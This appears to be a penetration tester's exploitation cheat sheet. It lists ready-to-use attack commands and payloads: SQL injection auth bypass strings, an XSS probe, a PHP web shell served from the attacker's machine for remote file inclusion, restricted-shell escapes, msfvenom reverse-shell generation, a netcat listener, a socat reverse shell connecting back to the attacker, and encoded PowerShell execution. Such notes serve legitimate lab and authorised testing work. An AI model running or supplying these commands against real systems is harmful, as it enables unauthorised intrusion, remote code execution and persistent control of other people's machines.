Exploitation
If a exploit doesn't work, but should
- Recheck your assumptions!
- Firewall Evasion
- Anti-Virus Evasion Techniques
-
Check for
- Already Enumerated Credentials (from a previous endpoint in the same network)
- Default Credentials
- Brute force and Wordlists
- If you already have valid credentials, is there maybe a pattern in them you recognize and could use for other users?
- SQL Injection
- Auth bypass:
' OR '1'='1 - Remember there are the following injection types:
- Union based
- Error based
- Blind based
- Time based
- and some other depending on the DB type
- Basic procedure:
- Check if its vulnerable:
< > ' " { } ; - Get the basic syntax down so you can repeat it easily, commonly you can test this by getting the DB version
- Extract the DBs
- Extract the DBs table names
- Extract the tables columns
- Extract the tables columns data
- Check if its vulnerable:
- MSSQL Error Based SQLi Template
- Great resources:
- Auth bypass:
- XSS:
<script>alert('XSS')</script> - Command Injection
- Remote File Inclusion
- Create a new file called
shell.php - Write
<?php echo shell_exec($_GET['cmd']); ?>as it’s content - Host it:
python -m http.server 80 - Use it:
http://{RHOST}/vuln.php?page=http://{LHOST}/shell.php&cmd=id
- Try out different file types! Maybe the application has a allow list
- File Inclusion/Path traversal
- Create a new file called
- Buffer Overflow]
- Malicious Microsoft Word Macro
-
Restricted Shells aka. Bash Jails
- Quick wins:
- If ‘/’ is allowed
export PATH=/bin:/usr/bin:/sbin:$PATHexport SHELL=/bin/sh
- chsh to change the shell:
chsh{USER's PASSWORD}/bin/bash
- Copy sh to our PATH:
cp /bin/sh /path/directory; sh
- SSHing from outside
ssh username@IP -t "/bin/sh"ssh username@IP -t "bash --noprofile"
- If ‘/’ is allowed
- Usually works:
- Check what you can use:
echo $PATH - List directory:
ls -al /home/username/* - Get a shell with one of the tools available to you in you’re PATH e.g.:
python -c "import pty;pty.spawn('/bin/bash')"- GTFOBins
- Set you’re new PATH to make the normal commands relative again:
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
- Check what you can use:
- Other Resources:
- Quick wins:
-
Public Exploits:
searchsploit -m {EXPLOIT_ID}- File Transfer Techniques
- Python
- Set the appropriate python version
pyenv shell 2.7.18pyenv shell 3.10.4
- Create a venv:
pyenv virtualenv {VENV_NAME} - Activate it:
pyenv activate {VENV_NAME} - Deactivate it:
source deactivate
- Set the appropriate python version
- C
- 64Bit exploit:
gcc -m64 exploit.c -o exploit - 32Bit exploit:
gcc -m32 exploit.c -o exploit - Windows exploits on Linux:
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe- Compiling Windows Exploits on Kali
- 64Bit exploit:
- C++
gplusplus
- C# / CS
csc /t:exe exploit.exe exploit.cs- For SNL files: (On a Windows host with Visual Studio Community Edition)
- DoubleClick on the snl file
- (Maybe change the Architecture to Any)
- Select the “Build” tab
- Press “Build Solution”
-
Reverse Shell Payloads
- Get a Listener:
rlwrap -r -f . nc -nvlp 4433 - Reverse Shell Generator
- [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#reverse-shell)
- MFSVenom:
- Windows:
msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o shell.exe - Linux:
msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf > shell.elfmsfvenom -p linux/x86/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf > shell.elf
- For more variants use:
msfvenom --list all
- Windows:
- Get a Listener:
-
PowerShell tips:
- If you want to convert a PowerShell script into it’s encrypted state
- from Kali:
cat file.ps1 | iconv -t UTF16LE | base64 -w 0 - from Win:
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("{COMMAND}"))
- from Kali:
- Execute:
powershell.exe -enc {ENCODED}
- If you want to convert a PowerShell script into it’s encrypted state
HINT
If you can’t upgrade a shell, and want to run a process that will need Ctrl-C to exit you can prepend it with
timeout 10s ...to make it exit after 10 seconds.
-
Create a interactive shell
- Fully:
- socat
- Kali:
socat TCP-LISTEN:8080,reuseaddr FILE:tty,raw,echo=0 - Target:
socat TCP4:<attackers_ip>:8080 EXEC:bash,pty,stderr,setsid,sigint,sane
- Kali:
/usr/bin/script -qc /bin/bash /dev/null/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
- socat
- Spawn:
/usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'echo os.system('/bin/bash')/bin/sh -iperl —e 'exec "/bin/sh";'perl: exec "/bin/sh";ruby: exec "/bin/sh"lua: os.execute('/bin/sh')- From within IRB:
exec "/bin/sh" - From within vi:
:!bash - From within vi:
:set shell=/bin/bash:shell - From within nmap:
!sh
- This is especially interesting if we have sudo permissions for these binaries! (→ PE)
- Upgrading Simple Shells to Fully Interactive TTYs
- Fully:
-
Check if the target can ping kali with:
sudo tcpdump -ni tun0- Filtering:
tcpdump -ni tun0 host 10.1.1.1tcpdump -ni tun0 src host 10.1.1.1tcpdump -ni tun0 dst host 10.1.1.1tcpdump -ni tun0 src net 172.16.0.0/12tcpdump -ni tun0 port 53tcpdump -ni tun0 tcp port 80tcpdump -ni tun0 proto \\icmp- 1
- Filtering:
Relevant Note(s):